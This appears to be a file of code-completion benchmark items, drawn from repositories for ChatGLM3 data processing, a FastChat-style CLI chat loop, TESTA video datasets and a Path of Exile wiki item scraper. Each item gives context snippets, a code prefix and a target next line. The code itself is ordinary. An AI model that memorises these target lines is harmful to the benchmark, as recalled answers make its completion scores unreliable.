dst_max_length > 0:\r\n # b_ids = b_ids[:dst_max_length]\r\n #\r\n # b_ids += [config.eos_token_id]\r\n # input_ids_qa = a_ids + b_ids\r\n # labels_all = copy.deepcopy(input_ids_qa) if not sup else [-100] * len(a_ids) + b_ids\r\n #\r\n # pos = 0\r\n # while pos < len(input_ids_qa):\r\n # input_ids = input_ids_qa[pos:pos + max_seq_length - len(sptoken)]\r\n # labels = labels_all[pos:pos + max_seq_length - len(sptoken)]\r\n #\r\n # pos += sliding_size\r\n # if np.all(np.asarray(labels) == -100):\r\n # continue\r\n #\r\n # input_ids = sptoken + input_ids\r\n # labels = sptoken + labels if not sup else [-100] * len(sptoken) + labels\r\n # ds.append(cls.final(input_ids,labels,max_seq_length,tokenizer))\r\n # return ds\r"
}
] | import copy
import glob
import json
import os
import typing
import numpy as np
import torch
from functools import cache
from deep_training.data_helper import DataHelper, ModelArguments, TrainingArguments, DataArguments, TrainingArgumentsHF, \
TrainingArgumentsCL, TrainingArgumentsAC
from fastdatasets.record import load_dataset as Loader, RECORD, WriterObject, gfile
from tqdm import tqdm
from transformers import HfArgumentParser
from data_processer import DataStrategy, TokenIdsMaker
from aigc_zoo.model_zoo.chatglm3.llm_model import ChatGLMTokenizer,PetlArguments,ChatGLMConfig
from config import *
| 2,312 | # @Time : 2023/1/22 16:22
# @Author : tk
# @FileName: data_utils.py
assert train_info_args['max_seq_length'] > 20
data_conf = {
'strategy': DataStrategy.truncation, # 数据策略选项
DataStrategy.truncation: {
'sup': True, # 是否监督训练
},
DataStrategy.siding: {
'sliding_size': train_info_args['max_seq_length'] // 3 * 2, #prompt滑动窗口大小
'sup': True, # 是否监督训练
"src_max_length": train_info_args['max_seq_length'] - 10,
"dst_max_length": None,
},
}
def preprocess(text):
#text = text.replace("\n", "\\n").replace("\t", "\\t")
return text
def postprocess(text):
# return text.replace("\\n", "\n").replace("\\t", "\t")
return text
def build_masks_and_position_ids_glm(batch_input_ids, ctxlens):
max_len = batch_input_ids.size(1)
batch_position_ids, batch_attention_mask = [], []
for input_ids,ctxlen in zip(batch_input_ids,ctxlens):
position_ids = list(range(0,max_len))
assert ctxlen <= max_len
attention_mask = [1] * ctxlen + [0] * (max_len - ctxlen)
batch_position_ids.append(torch.tensor(position_ids,dtype=torch.long))
batch_attention_mask.append(torch.tensor(attention_mask,dtype=torch.long))
batch_attention_mask = torch.stack(batch_attention_mask, dim=0)
batch_position_ids = torch.stack(batch_position_ids, dim=0)
return batch_attention_mask,batch_position_ids
class NN_DataHelper(DataHelper):
index = 1
tokens_ids_maker = None
def on_data_ready(self):
self.index = -1
# 切分词
def on_data_process(self, data: typing.Any, mode: str):
self.index += 1
tokenizer: ChatGLMTokenizer = self.tokenizer # noqa
config: ChatGLMConfig = self.config # noqa
max_seq_length = self.max_seq_length_dict[mode]
if self.tokens_ids_maker is None:
| # @Time : 2023/1/22 16:22
# @Author : tk
# @FileName: data_utils.py
assert train_info_args['max_seq_length'] > 20
data_conf = {
'strategy': DataStrategy.truncation, # 数据策略选项
DataStrategy.truncation: {
'sup': True, # 是否监督训练
},
DataStrategy.siding: {
'sliding_size': train_info_args['max_seq_length'] // 3 * 2, #prompt滑动窗口大小
'sup': True, # 是否监督训练
"src_max_length": train_info_args['max_seq_length'] - 10,
"dst_max_length": None,
},
}
def preprocess(text):
#text = text.replace("\n", "\\n").replace("\t", "\\t")
return text
def postprocess(text):
# return text.replace("\\n", "\n").replace("\\t", "\t")
return text
def build_masks_and_position_ids_glm(batch_input_ids, ctxlens):
max_len = batch_input_ids.size(1)
batch_position_ids, batch_attention_mask = [], []
for input_ids,ctxlen in zip(batch_input_ids,ctxlens):
position_ids = list(range(0,max_len))
assert ctxlen <= max_len
attention_mask = [1] * ctxlen + [0] * (max_len - ctxlen)
batch_position_ids.append(torch.tensor(position_ids,dtype=torch.long))
batch_attention_mask.append(torch.tensor(attention_mask,dtype=torch.long))
batch_attention_mask = torch.stack(batch_attention_mask, dim=0)
batch_position_ids = torch.stack(batch_position_ids, dim=0)
return batch_attention_mask,batch_position_ids
class NN_DataHelper(DataHelper):
index = 1
tokens_ids_maker = None
def on_data_ready(self):
self.index = -1
# 切分词
def on_data_process(self, data: typing.Any, mode: str):
self.index += 1
tokenizer: ChatGLMTokenizer = self.tokenizer # noqa
config: ChatGLMConfig = self.config # noqa
max_seq_length = self.max_seq_length_dict[mode]
if self.tokens_ids_maker is None:
| self.tokens_ids_maker = TokenIdsMaker(tokenizer=tokenizer,config=config)
| 1 | 2023-10-27 09:15:00+00:00 | 4k |
DAMO-NLP-SG/CLEX | serve/cli.py | [
{
"identifier": "ChatIO",
"path": "serve/inference.py",
"snippet": "class ChatIO(abc.ABC):\n @abc.abstractmethod\n def prompt_for_input(self, role: str) -> str:\n \"\"\"Prompt for input from a role.\"\"\"\n\n @abc.abstractmethod\n def prompt_for_output(self, role: str):\n \"\"\"Prompt for output from a role.\"\"\"\n\n @abc.abstractmethod\n def stream_output(self, output_stream):\n \"\"\"Stream output.\"\"\"\n\n @abc.abstractmethod\n def print_output(self, text: str):\n \"\"\"Print output.\"\"\""
},
{
"identifier": "chat_loop",
"path": "serve/inference.py",
"snippet": "def chat_loop(\n model_path: str,\n device: str,\n num_gpus: int,\n max_gpu_memory: str,\n dtype: Optional[torch.dtype],\n load_8bit: bool,\n cpu_offloading: bool,\n conv_template: Optional[str],\n conv_system_msg: Optional[str],\n temperature: float,\n repetition_penalty: float,\n max_new_tokens: int,\n chatio: ChatIO,\n gptq_config: Optional[GptqConfig] = None,\n awq_config: Optional[AWQConfig] = None,\n exllama_config: Optional[ExllamaConfig] = None,\n revision: str = \"main\",\n judge_sent_end: bool = True,\n debug: bool = True,\n history: bool = True,\n log_scale: bool = True,\n):\n # Model\n config = AutoConfig.from_pretrained(\n model_path\n )\n config.log_scale = log_scale\n model, tokenizer = load_model(\n model_path,\n device=device,\n num_gpus=num_gpus,\n max_gpu_memory=max_gpu_memory,\n dtype=dtype,\n load_8bit=load_8bit,\n cpu_offloading=cpu_offloading,\n gptq_config=gptq_config,\n awq_config=awq_config,\n exllama_config=exllama_config,\n revision=revision,\n debug=debug,\n config=config\n )\n generate_stream_func = get_generate_stream_function(model, model_path)\n\n model_type = str(type(model)).lower()\n is_t5 = \"t5\" in model_type\n is_codet5p = \"codet5p\" in model_type\n\n # Hardcode T5's default repetition penalty to be 1.2\n if is_t5 and repetition_penalty == 1.0:\n repetition_penalty = 1.2\n\n # Set context length\n context_len = get_context_length(model.config)\n\n # Chat\n def new_chat():\n if conv_template:\n conv = get_conv_template(conv_template)\n else:\n conv = get_conversation_template(model_path)\n if conv_system_msg is not None:\n conv.set_system_message(conv_system_msg)\n return conv\n\n def reload_conv(conv):\n \"\"\"\n Reprints the conversation from the start.\n \"\"\"\n for message in conv.messages[conv.offset :]:\n chatio.prompt_for_output(message[0])\n chatio.print_output(message[1])\n\n conv = None\n\n while True:\n if not history or not conv:\n conv = new_chat()\n\n try:\n inp = chatio.prompt_for_input(conv.roles[0])\n except EOFError:\n inp = \"\"\n\n if inp == \"!!exit\" or not inp:\n print(\"exit...\")\n break\n elif inp == \"!!reset\":\n print(\"resetting...\")\n conv = new_chat()\n continue\n elif inp == \"!!remove\":\n print(\"removing last message...\")\n if len(conv.messages) > conv.offset:\n # Assistant\n if conv.messages[-1][0] == conv.roles[1]:\n conv.messages.pop()\n # User\n if conv.messages[-1][0] == conv.roles[0]:\n conv.messages.pop()\n reload_conv(conv)\n else:\n print(\"No messages to remove.\")\n continue\n elif inp == \"!!regen\":\n print(\"regenerating last message...\")\n if len(conv.messages) > conv.offset:\n # Assistant\n if conv.messages[-1][0] == conv.roles[1]:\n conv.messages.pop()\n # User\n if conv.messages[-1][0] == conv.roles[0]:\n reload_conv(conv)\n # Set inp to previous message\n inp = conv.messages.pop()[1]\n else:\n # Shouldn't happen in normal circumstances\n print(\"No user message to regenerate from.\")\n continue\n else:\n print(\"No messages to regenerate.\")\n continue\n elif inp.startswith(\"!!save\"):\n args = inp.split(\" \", 1)\n\n if len(args) != 2:\n print(\"usage: !!save <filename>\")\n continue\n else:\n filename = args[1]\n\n # Add .json if extension not present\n if not \".\" in filename:\n filename += \".json\"\n\n print(\"saving...\", filename)\n with open(filename, \"w\") as outfile:\n json.dump(conv.dict(), outfile)\n continue\n elif inp.startswith(\"!!load\"):\n args = inp.split(\" \", 1)\n\n if len(args) != 2:\n print(\"usage: !!load <filename>\")\n continue\n else:\n filename = args[1]\n\n # Check if file exists and add .json if needed\n if not os.path.exists(filename):\n if (not filename.endswith(\".json\")) and os.path.exists(\n filename + \".json\"\n ):\n filename += \".json\"\n else:\n print(\"file not found:\", filename)\n continue\n\n print(\"loading...\", filename)\n with open(filename, \"r\") as infile:\n new_conv = json.load(infile)\n\n conv = get_conv_template(new_conv[\"template_name\"])\n conv.set_system_message(new_conv[\"system_message\"])\n conv.messages = new_conv[\"messages\"]\n reload_conv(conv)\n continue\n\n conv.append_message(conv.roles[0], inp)\n conv.append_message(conv.roles[1], None)\n prompt = conv.get_prompt()\n\n if is_codet5p: # codet5p is a code completion model.\n prompt = inp\n\n gen_params = {\n \"model\": model_path,\n \"prompt\": prompt,\n \"temperature\": temperature,\n \"repetition_penalty\": repetition_penalty,\n \"max_new_tokens\": max_new_tokens,\n \"stop\": conv.stop_str,\n \"stop_token_ids\": conv.stop_token_ids,\n \"echo\": False,\n }\n\n try:\n chatio.prompt_for_output(conv.roles[1])\n output_stream = generate_stream_func(\n model,\n tokenizer,\n gen_params,\n device,\n context_len=context_len,\n judge_sent_end=judge_sent_end,\n )\n t = time.time()\n outputs = chatio.stream_output(output_stream)\n duration = time.time() - t\n conv.update_last_message(outputs.strip())\n\n if debug:\n num_tokens = len(tokenizer.encode(outputs))\n msg = {\n \"conv_template\": conv.name,\n \"prompt\": prompt,\n \"outputs\": outputs,\n \"speed (token/s)\": round(num_tokens / duration, 2),\n }\n print(f\"\\n{msg}\\n\")\n\n except KeyboardInterrupt:\n print(\"stopped generation.\")\n # If generation didn't finish\n if conv.messages[-1][1] is None:\n conv.messages.pop()\n # Remove last user message, so there isn't a double up\n if conv.messages[-1][0] == conv.roles[0]:\n conv.messages.pop()\n\n reload_conv(conv)"
}
] | import argparse
import os
import re
import sys
import torch
from prompt_toolkit import PromptSession
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.completion import WordCompleter
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.key_binding import KeyBindings
from rich.console import Console
from rich.live import Live
from rich.markdown import Markdown
from fastchat.model.model_adapter import add_model_args
from fastchat.modules.awq import AWQConfig
from fastchat.modules.exllama import ExllamaConfig
from fastchat.modules.gptq import GptqConfig
from serve.inference import ChatIO, chat_loop
from fastchat.utils import str_to_torch_dtype | 2,173 | """
Chat with a model with command line interface.
Usage:
python3 -m fastchat.serve.cli --model lmsys/vicuna-7b-v1.3
python3 -m fastchat.serve.cli --model lmsys/fastchat-t5-3b-v1.0
Other commands:
- Type "!!exit" or an empty line to exit.
- Type "!!reset" to start a new conversation.
- Type "!!remove" to remove the last prompt.
- Type "!!regen" to regenerate the last message.
- Type "!!save <filename>" to save the conversation history to a json file.
- Type "!!load <filename>" to load a conversation history from a json file.
"""
| """
Chat with a model with command line interface.
Usage:
python3 -m fastchat.serve.cli --model lmsys/vicuna-7b-v1.3
python3 -m fastchat.serve.cli --model lmsys/fastchat-t5-3b-v1.0
Other commands:
- Type "!!exit" or an empty line to exit.
- Type "!!reset" to start a new conversation.
- Type "!!remove" to remove the last prompt.
- Type "!!regen" to regenerate the last message.
- Type "!!save <filename>" to save the conversation history to a json file.
- Type "!!load <filename>" to load a conversation history from a json file.
"""
| class SimpleChatIO(ChatIO): | 0 | 2023-10-25 05:30:25+00:00 | 4k |
RenShuhuai-Andy/TESTA | data/video_dataset.py | [
{
"identifier": "pre_caption",
"path": "data/utils.py",
"snippet": "def pre_caption(caption, max_words=50):\n caption = re.sub(\n r\"([!\\\"()*#~])\", #r\"([!\\\"()*#:;~])\" #r\"([.!\\\"()*#:;~])\",\n ' ',\n caption.lower(),\n )\n caption = re.sub(\n r\"\\s{2,}\",\n ' ', \n caption,\n )\n caption = caption.rstrip('\\n')\n caption = caption.strip(' ')\n\n # truncate caption\n caption_words = caption.split(' ')\n if len(caption_words) > max_words:\n caption = ' '.join(caption_words[:max_words])\n\n return caption"
},
{
"identifier": "pre_question",
"path": "data/utils.py",
"snippet": "def pre_question(question, max_ques_words=50):\n question = re.sub(\n r\"([.!\\\"()*#:;~])\",\n '',\n question.lower(),\n )\n question = question.rstrip(' ')\n\n # truncate question\n question_words = question.split(' ')\n if len(question_words) > max_ques_words:\n question = ' '.join(question_words[:max_ques_words])\n\n return question"
},
{
"identifier": "TemporalConsistentRandomAugment",
"path": "data/randaugment.py",
"snippet": "class TemporalConsistentRandomAugment(object):\n\n def __init__(self, N=2, M=10, p=0.0, tensor_in_tensor_out=True, augs=[]):\n self.N = N\n self.M = M\n self.p = p\n self.tensor_in_tensor_out = tensor_in_tensor_out\n if augs:\n self.augs = augs \n else:\n self.augs = list(arg_dict.keys())\n\n def get_random_ops(self):\n sampled_ops = np.random.choice(self.augs, self.N, replace=False)\n # return [(op, 0.5, self.M) for op in sampled_ops]\n return [(op, self.M) for op in sampled_ops]\n\n def __call__(self, frames):\n assert frames.shape[-1] == 3, 'Expecting last dimension for 3-channels RGB (b, h, w, c).'\n \n if self.tensor_in_tensor_out:\n frames = frames.numpy().astype(np.uint8)\n \n num_frames = frames.shape[0]\n\n ops = num_frames * [self.get_random_ops()]\n apply_or_not = num_frames * [np.random.random(size=self.N) > self.p]\n\n frames = torch.stack(list(map(self._aug, frames, ops, apply_or_not)), dim=0).float()\n\n return frames\n\n def _aug(self, img, ops, apply_or_not):\n for i, (name, level) in enumerate(ops):\n if not apply_or_not[i]:\n continue\n args = arg_dict[name](level)\n img = func_dict[name](img, *args) \n return torch.from_numpy(img)"
}
] | import logging
import copy
import math
import pickle
import torch
import numpy as np
import random
import decord
import json
import os
import random
import pandas as pd
import collections
from torch.utils.data import Dataset
from torchvision.datasets.utils import download_url
from PIL import Image
from decord import VideoReader
from data.utils import pre_caption, pre_question
from .randaugment import TemporalConsistentRandomAugment | 2,348 |
def load_video_from_path_decord(video_path, frm_sampling_strategy, num_frm, height=None, width=None, start_time=None,
end_time=None, fps=-1):
try:
if not height or not width:
vr = VideoReader(video_path)
else:
vr = VideoReader(video_path, width=width, height=height)
vlen = len(vr)
if start_time or end_time:
assert fps > 0, 'must provide video fps if specifying start and end time.'
start_idx = min(int(start_time * fps), vlen)
end_idx = min(int(end_time * fps), vlen)
else:
start_idx, end_idx = 0, vlen
if frm_sampling_strategy == 'uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm, dtype=int)
elif frm_sampling_strategy == 'nlvl_uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
elif frm_sampling_strategy == 'nlvl_rand':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
# generate some random perturbations
strides = [frame_indices[i] - frame_indices[i - 1] for i in range(1, len(frame_indices))] + [vlen - frame_indices[-1]]
pertube = np.array([np.random.randint(0, stride) for stride in strides])
frame_indices = frame_indices + pertube
elif frm_sampling_strategy == 'rand':
frame_indices = sorted(random.sample(range(vlen), num_frm))
elif frm_sampling_strategy == 'headtail':
frame_indices_head = sorted(random.sample(range(vlen // 2), num_frm // 2))
frame_indices_tail = sorted(random.sample(range(vlen // 2, vlen), num_frm // 2))
frame_indices = frame_indices_head + frame_indices_tail
else:
raise NotImplementedError('Invalid sampling strategy {} '.format(frm_sampling_strategy))
raw_sample_frms = vr.get_batch(frame_indices)
except Exception as e:
return None
raw_sample_frms = raw_sample_frms.permute(0, 3, 1, 2) # (N, H, W, C) to (N, C, H, W)
return raw_sample_frms
class VideoDataset(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=384,
video_fmt='.mp4'):
'''
image_root (string): Root directory of video
ann_root (string): directory to store the annotation file
'''
url = 'https://storage.googleapis.com/sfr-vision-language-research/datasets/msrvtt_test.jsonl'
filename = 'msrvtt_test.jsonl'
download_url(url, ann_root)
self.annotation = load_jsonl(os.path.join(ann_root, filename))
print('number of instances: %s' % len(self.annotation))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_root = video_root
self.video_fmt = video_fmt
self.img_norm = ImageNorm(mean=(0.48145466, 0.4578275, 0.40821073), std=(0.26862954, 0.26130258, 0.27577711))
# self.text = [pre_caption(ann['caption'], 40) for ann in self.annotation]
self.txt2video = [i for i in range(len(self.annotation))]
self.video2txt = self.txt2video
def __len__(self):
return len(self.annotation)
def __getitem__(self, index):
ann = self.annotation[index]
video_path = os.path.join(self.video_root, ann['clip_name'] + self.video_fmt)
if not os.path.exists(video_path):
print('not exist %s' % video_path)
return
vid_frm_array = load_video_from_path_decord(video_path, self.frm_sampling_strategy, self.num_frm, height=self.max_img_size, width=self.max_img_size)
video = self.img_norm(vid_frm_array.float())
return video, ann['clip_name']
class caption_video(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=224,
split='test', max_words=30, prompt='', video_resize=256, input_segments=False, input_asr=False,
asr_drop=0.0, seg_drop=0.0):
'''
image_root (string): Root directory of video
ann_root (string): directory to store the annotation file
'''
filename = '%s.caption_coco_format.json' % split
with open(os.path.join(ann_root, filename), 'r') as f:
self.annotation = json.load(f)['annotations']
if split == 'train':
print('number of instances: %s in %s dataset' % (len(self.annotation), split))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_resize = video_resize
self.video_random_cropper = VideoRandomSquareCrop(max_img_size)
|
decord.bridge.set_bridge("torch")
class VideoRandomSquareCrop(object):
def __init__(self, crop_size, p=0.5):
assert isinstance(crop_size, int)
self.crop_size = crop_size
self.p = p
def __call__(self, video):
"""
Args:
img (torch.tensor): video to be cropped.
Returns:
torch.tensor: cropped video.
"""
if isinstance(video, torch.Tensor):
if len(video.shape) == 4:
b, t, h, w = video.shape
else:
raise RuntimeError('Expecting 4-dimensional tensor of shape (b,t,h,w), got {}'.format(video.shape))
# if random.uniform(0, 1) < self.p:
# video = torch.flip(video, (3,))
x = random.randint(0, h - self.crop_size)
y = random.randint(0, w - self.crop_size)
return video[:, :, x: x + self.crop_size, y: y + self.crop_size]
else:
raise NotImplementedError('Support only torch.Tensor as input, got {}'.format(type(video)))
class ImageNorm(object):
"""Apply Normalization to Image Pixels on GPU
"""
def __init__(self, mean, std):
self.mean = torch.tensor(mean).view(1, 3, 1, 1)
self.std = torch.tensor(std).view(1, 3, 1, 1)
def __call__(self, img):
if torch.max(img) > 1 and self.mean.max() <= 1:
img.div_(255.)
return img.sub_(self.mean).div_(self.std)
def load_jsonl(filename):
with open(filename, "r") as f:
return [json.loads(l.strip("\n")) for l in f.readlines()]
def load_video_from_path_decord(video_path, frm_sampling_strategy, num_frm, height=None, width=None, start_time=None,
end_time=None, fps=-1):
try:
if not height or not width:
vr = VideoReader(video_path)
else:
vr = VideoReader(video_path, width=width, height=height)
vlen = len(vr)
if start_time or end_time:
assert fps > 0, 'must provide video fps if specifying start and end time.'
start_idx = min(int(start_time * fps), vlen)
end_idx = min(int(end_time * fps), vlen)
else:
start_idx, end_idx = 0, vlen
if frm_sampling_strategy == 'uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm, dtype=int)
elif frm_sampling_strategy == 'nlvl_uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
elif frm_sampling_strategy == 'nlvl_rand':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
# generate some random perturbations
strides = [frame_indices[i] - frame_indices[i - 1] for i in range(1, len(frame_indices))] + [vlen - frame_indices[-1]]
pertube = np.array([np.random.randint(0, stride) for stride in strides])
frame_indices = frame_indices + pertube
elif frm_sampling_strategy == 'rand':
frame_indices = sorted(random.sample(range(vlen), num_frm))
elif frm_sampling_strategy == 'headtail':
frame_indices_head = sorted(random.sample(range(vlen // 2), num_frm // 2))
frame_indices_tail = sorted(random.sample(range(vlen // 2, vlen), num_frm // 2))
frame_indices = frame_indices_head + frame_indices_tail
else:
raise NotImplementedError('Invalid sampling strategy {} '.format(frm_sampling_strategy))
raw_sample_frms = vr.get_batch(frame_indices)
except Exception as e:
return None
raw_sample_frms = raw_sample_frms.permute(0, 3, 1, 2) # (N, H, W, C) to (N, C, H, W)
return raw_sample_frms
class VideoDataset(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=384,
video_fmt='.mp4'):
'''
image_root (string): Root directory of video
ann_root (string): directory to store the annotation file
'''
url = 'https://storage.googleapis.com/sfr-vision-language-research/datasets/msrvtt_test.jsonl'
filename = 'msrvtt_test.jsonl'
download_url(url, ann_root)
self.annotation = load_jsonl(os.path.join(ann_root, filename))
print('number of instances: %s' % len(self.annotation))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_root = video_root
self.video_fmt = video_fmt
self.img_norm = ImageNorm(mean=(0.48145466, 0.4578275, 0.40821073), std=(0.26862954, 0.26130258, 0.27577711))
# self.text = [pre_caption(ann['caption'], 40) for ann in self.annotation]
self.txt2video = [i for i in range(len(self.annotation))]
self.video2txt = self.txt2video
def __len__(self):
return len(self.annotation)
def __getitem__(self, index):
ann = self.annotation[index]
video_path = os.path.join(self.video_root, ann['clip_name'] + self.video_fmt)
if not os.path.exists(video_path):
print('not exist %s' % video_path)
return
vid_frm_array = load_video_from_path_decord(video_path, self.frm_sampling_strategy, self.num_frm, height=self.max_img_size, width=self.max_img_size)
video = self.img_norm(vid_frm_array.float())
return video, ann['clip_name']
class caption_video(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=224,
split='test', max_words=30, prompt='', video_resize=256, input_segments=False, input_asr=False,
asr_drop=0.0, seg_drop=0.0):
'''
image_root (string): Root directory of video
ann_root (string): directory to store the annotation file
'''
filename = '%s.caption_coco_format.json' % split
with open(os.path.join(ann_root, filename), 'r') as f:
self.annotation = json.load(f)['annotations']
if split == 'train':
print('number of instances: %s in %s dataset' % (len(self.annotation), split))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_resize = video_resize
self.video_random_cropper = VideoRandomSquareCrop(max_img_size) | self.video_rand_aug = TemporalConsistentRandomAugment(N=2, M=5, augs=['Identity', 'Contrast','Brightness','Sharpness', 'ShearX', 'ShearY', 'TranslateX', 'TranslateY', 'Rotate', 'HorizontalFlip']) | 2 | 2023-10-29 12:09:38+00:00 | 4k |
flbraun/poe-palette | data/wiki.py | [
{
"identifier": "League",
"path": "data/leagues.py",
"snippet": "class League:\n type_: LeagueType\n title: str # e.g. \"Ancestor\"\n slug: str # e.g. \"ancestor\"\n is_hardcore: bool"
},
{
"identifier": "NinjaCategory",
"path": "data/ninja.py",
"snippet": "class NinjaIndex:\n def match(self, item_name: str) -> NinjaCategory | None:\n def stats(self) -> dict[NinjaCategory, int]:\n def print_stats(self) -> None:\ndef get_ninja_index(league: League) -> NinjaIndex:\ndef make_ninja_url(league: League, item_name: str, base_name: str | None, category: NinjaCategory) -> URL | None:"
},
{
"identifier": "automake_trade_url",
"path": "data/trade.py",
"snippet": "def automake_trade_url(league: League, category: NinjaCategory, item_name: str, base_item: str | None = None) -> URL:\n # NinjaCategory is a good (but not perfect) indicator of whether an item is bulk tradable.\n if category in bulk_tradable_ninja_categories:\n if category in {\n NinjaCategory.MAPS,\n NinjaCategory.BLIGHTED_MAPS,\n NinjaCategory.BLIGHT_RAVAGED_MAPS,\n NinjaCategory.SCOURGED_MAPS,\n }:\n item_name = f'{item_name} Tier 16'\n return make_bulk_trade_url(league, item_name)\n\n if base_item:\n trade_type, trade_name = base_item, item_name\n else:\n trade_type, trade_name = item_name, None\n return make_trade_url(league, trade_type, name=trade_name)"
},
{
"identifier": "Rarity",
"path": "data/types.py",
"snippet": "class Rarity(Enum):\n NORMAL = 'normal'\n MAGIC = 'magic'\n RARE = 'rare'\n UNIQUE = 'unique'"
},
{
"identifier": "Entry",
"path": "data/utils.py",
"snippet": "class Entry:\n \"\"\"\n The final data container that serializes data for the\n electron app to consume.\n \"\"\"\n display_text: str\n wiki_url: URL | None = None\n poedb_url: URL | None = None\n ninja_url: URL | None = None\n trade_url: URL | None = None\n tft_url: URL | None = None\n tool_url: URL | None = None"
},
{
"identifier": "LoggedRequestsSession",
"path": "data/utils.py",
"snippet": "class LoggedRequestsSession(requests.Session):\n def __init__(self, *args, **kwargs) -> None:\n super().__init__(*args, **kwargs)\n\n self.hooks['response'].append(self.log_response_stats)\n\n @staticmethod\n def log_response_stats(r: requests.Session, *args, **kwargs) -> None:\n logger = logging.getLogger('http_request')\n logger.info(\n '%s %s %s %s',\n r.url,\n r.status_code,\n f'{int(r.elapsed.total_seconds() * 1000)}ms',\n humanize.naturalsize(len(r.content), binary=True).replace(' ', ''),\n )"
},
{
"identifier": "make_poedb_url",
"path": "data/utils.py",
"snippet": "def make_poedb_url(item_name: str) -> URL:\n item_name = item_name.replace(' ', '_').replace(\"'\", '')\n item_name = urllib.parse.quote(item_name)\n return f'https://poedb.tw/us/{item_name}'"
},
{
"identifier": "make_wiki_url",
"path": "data/utils.py",
"snippet": "def make_wiki_url(item_name: str) -> URL:\n item_name = item_name.replace(' ', '_')\n return f'https://www.poewiki.net/wiki/{item_name}'"
}
] | import http
import itertools
import pprint
from collections.abc import Generator
from tabulate import tabulate
from .leagues import League
from .ninja import NinjaCategory, get_ninja_index, make_ninja_url
from .trade import automake_trade_url
from .types import Rarity
from .utils import Entry, LoggedRequestsSession, make_poedb_url, make_wiki_url | 3,016 | 'Medium Cluster Jewel',
'Small Clorster Jewel',
'Small Cluster Jewel',
'Breach Ring', # always drops rare and corrupted
'Ashscale Talisman', # always drops rare and corrupted
'Avian Twins Talisman', # always drops rare and corrupted
'Black Maw Talisman', # always drops rare and corrupted
'Bonespire Talisman', # always drops rare and corrupted
'Breakrib Talisman', # always drops rare and corrupted
'Chrysalis Talisman', # always drops rare and corrupted
'Clutching Talisman', # always drops rare and corrupted
'Deadhand Talisman', # always drops rare and corrupted
'Deep One Talisman', # always drops rare and corrupted
'Fangjaw Talisman', # always drops rare and corrupted
'Hexclaw Talisman', # always drops rare and corrupted
'Horned Talisman', # always drops rare and corrupted
'Lone Antler Talisman', # always drops rare and corrupted
'Longtooth Talisman', # always drops rare and corrupted
'Mandible Talisman', # always drops rare and corrupted
'Monkey Paw Talisman', # always drops rare and corrupted
'Monkey Twins Talisman', # always drops rare and corrupted
'Primal Skull Talisman', # always drops rare and corrupted
'Rot Head Talisman', # always drops rare and corrupted
'Rotfeather Talisman', # always drops rare and corrupted
'Spinefuse Talisman', # always drops rare and corrupted
'Splitnewt Talisman', # always drops rare and corrupted
'Three Hands Talisman', # always drops rare and corrupted
'Three Rat Talisman', # always drops rare and corrupted
'Undying Flesh Talisman', # always drops rare and corrupted
'Wereclaw Talisman', # always drops rare and corrupted
'Writhing Talisman', # always drops rare and corrupted
"Thief's Trinket", # always drops rare and corrupted
# currency (mostly shards)
'Chaos Orb', # gold standard, so will never be listed
"Facetor's Lens", # price varies by stored experience
'Alchemy Shard',
'Alteration Shard',
'Ancient Shard',
'Bestiary Orb',
'Binding Shard',
'Chaos Shard',
"Engineer's Shard",
'Horizon Shard',
'Imprint',
'Imprinted Bestiary Orb',
'Regal Shard',
'Scroll Fragment',
'Transmutation Shard',
"Harbinger's Shard",
# misc
'Fine Incubator', # low-level version of Ornate Incubator
'Whispering Incubator', # low-level version Infused Incubator
"Gemcutter's Incubator", # superseded by Thaumaturge's Incubator?
'Pale Court Set',
'Blood-filled Vessel',
'Chronicle of Atzoatl',
'Deadly End', # The Tower of Ordeals piece
'Ignominious Fate', # The Tower of Ordeals piece
'Victorious Fate', # The Tower of Ordeals piece
'Will of Chaos', # The Tower of Ordeals piece
'Deregulation Scroll', # upgrades Harbinger items
'Electroshock Scroll', # upgrades Harbinger items
'Fragmentation Scroll', # upgrades Harbinger items
'Haemocombustion Scroll', # upgrades Harbinger items
'Specularity Scroll', # upgrades Harbinger items
'Time-light Scroll', # upgrades Harbinger items
'Ritual Splinter',
*( # non-collectable Expedition artifacts
f'{tier} {faction} Artifact' for tier, faction in itertools.product(
('Lesser', 'Greater', 'Grand', 'Exceptional'),
('Black Scythe', 'Broken Circle', 'Order', 'Sun'),
)
),
}
KNOWN_NINJA_UNLISTED_CLASSES: set[str] = { # wiki item classes that are never listed on ninja
'Monster Organ Sample',
'Voidstone',
'Captured Soul',
'Incursion Item',
'Fishing Rod',
'Expedition Logbook',
"Rogue's Brooch",
"Rogue's Cloak",
"Rogue's Gear",
"Rogue's Tool",
'Heist Target',
'Labyrinth Key',
'Labyrinth Trinket',
'Sanctum Research',
}
def get_items(league: League) -> Generator[Entry, None, None]:
ninja_unknown = []
ninja_index = get_ninja_index(league)
for item in iter_wiki_query(
tables='items',
fields='name,base_item,class,rarity_id,cannot_be_traded_or_modified',
where='drop_enabled=true AND class != "Hideout Decoration" AND class != "Cosmetic Item" AND class != "Quest Item"', # noqa: E501
group_by='name',
):
# unpack result fields
name, base_item, class_, rarity, tradable = (
item['title']['name'],
item['title']['base item'],
item['title']['class'],
Rarity(item['title']['rarity id']),
not bool(int(item['title']['cannot be traded or modified'])),
)
if name in WIKI_ITEM_BLACKLIST:
continue
ninja_category = ninja_index.match(name)
